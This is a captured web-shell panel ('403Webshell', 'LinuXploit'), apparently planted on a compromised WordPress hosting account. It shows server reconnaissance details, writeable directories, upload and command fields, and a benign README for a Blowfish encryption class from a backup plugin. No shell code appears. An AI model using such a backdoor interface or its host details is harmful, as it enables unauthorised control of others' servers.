403Webshell
Server IP : 104.21.14.103  /  Your IP : 3.145.180.227
Web Server : LiteSpeed
System : Linux business53.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : giankuin ( 1871)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/giankuin/khowordpress.com/wp-content/plugins/duplicator-pro/lib/pcrypt/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/giankuin/khowordpress.com/wp-content/plugins/duplicator-pro/lib/pcrypt/README
This is a class to encrypt and decrypt data using some algorithms and methods.
Actually it supports:
            - Blowfish 
            - ECB, CBC (modes)

0. Install

Verify if the algorithm files is in the cipher.

1. How To:

To use this class you need to instanciate it, selecting the mode, algorithm and key, then you can call encrypt and decrypt methods.

Example:
  
  require 'class.pcrypt.php';
  
  /* MODE: MODE_ECB or MODE_CBC
     ALGO: BLOWFISH
     KEY:  Your secret key :) (max lenght: 56)
  */
  $crypt = new pcrypt(MODE_ECB, "BLOWFISH", "secretkey");
  
  // to encrypt
  $plaintext  = "password";
  $ciphertext = $crypt->encrypt($plaintext);

  // to decrypt
  $decrypted  = $crypt->decrypt($ciphertext);

2. TODO

   - Implement other algorithms and block modes
   - Improve error handling function(s)
   - Implement methods to discover automatically the ALGO used (maybe a header)
   - Implement a method to change the key
   - Compatible with mcrypt
   - Correct bugs :)

That's all, if you get any trouble please contact.

Youez - 2016 - github.com/yon3zu
LinuXploit